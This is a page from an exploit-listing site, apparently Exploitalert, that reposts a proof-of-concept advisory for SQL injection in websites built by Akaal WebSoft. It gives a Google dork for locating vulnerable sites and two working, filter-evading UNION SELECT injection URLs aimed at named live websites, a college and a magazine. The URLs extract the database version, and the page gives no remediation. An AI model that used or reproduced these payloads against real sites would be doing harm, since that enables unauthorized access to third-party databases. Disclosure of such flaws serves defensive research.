Advertisement






Akaal WebSoft Pvt - Sql Injection Vulnerability

CVE Category Price Severity
CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-07-15
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070038

Below is a copy:

Akaal WebSoft Pvt - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Akaal WebSoft Pvt - Sql Injection Vulnerability
#Date: 2022-07-15
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed By : Akaal WebSoft Pvt. Ltd"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Designed By : Akaal WebSoft Pvt. Ltd"

### Demo :

https://khalsacollege.edu.in/Department.php?id=-10%20%23AAAAA%0Aunion%20%23AAAAA%0Aselect%201,2,3,4,5,version()--

http://www.wahgamagazine.com/chapter-view.php?Id=1%20/*!12345union*/%20select%201,2,version(),4,5,6--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.